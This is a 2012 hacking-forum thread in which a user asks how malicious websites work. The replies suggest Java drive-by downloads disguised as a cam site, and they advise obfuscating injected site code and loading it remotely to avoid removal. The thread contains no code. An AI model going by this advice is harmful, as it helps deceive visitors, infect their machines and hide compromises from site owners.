EvilZone
Hacking and Security => Hacking and Security => : m0l0ko December 26, 2012, 02:58:31 AM
-
Besides my own computers, I've never actually hacked anyone, infected them with malware or done anything of that sort (with the exception of when I was around 12 and played around with sub7) but I get a great deal of satisfaction in learning how these things work. I practice hacking VMs and comps on my LAN so all my knowledge so far is focused on LAN based attacks. I've been making websites for years now so I'd like to learn about making malicious websites (I've seen firefox warn me about them but I still don't even know what they are). Malicious websites that I make myself, not hijacking other sites with XSS etc.
So I'm hoping knowledgeable people here can start filling me in on what malicious websites are. I know that java applets are very dangerous and I read that the same goes for activex but I'm wondering more about server side and browser side scripts and things like flash. What kind of malicious things can be done with PHP? I see that security experts always recommend using noscript to disable javascript by default. What kind of malicious things can be done with javascript? As for flash, I have absolutely no experience with actionscript but I've heard flash is what creates those LSO cookies.
-
In PHP, you could log your victim's IP address, but PHP's uses for malware are somewhat limited due to it being server-side, but you can still have some fun.
In JavaScript, you can do some VERY nasty things, Google around for some JS viruses.
You could create a Java-drive-by, which will download-and-execute a file without the user knowing, provided they click the "allow applet" button, but you could fool horny men into running it by making it look like a cam site.
The possibilities are endless, you just need some creativity and some programming knowledge.
NoScript is a must, it will stop any JavaScript.
-
95% of the actual malicious code I clean daily is Javascript. The 5% left over is .htaccess and php redirects or php shells. Even then the key to success is carefully meshing the code with the flow of the site to make it appear legitimate. Heavy obfuscation is needed where someone may determine that you put it there. Most hosts won't take the time to decipher it, only remove it. Best way to possibly go about it is actually pull the code from somewhere else. This makes it much much harder to track.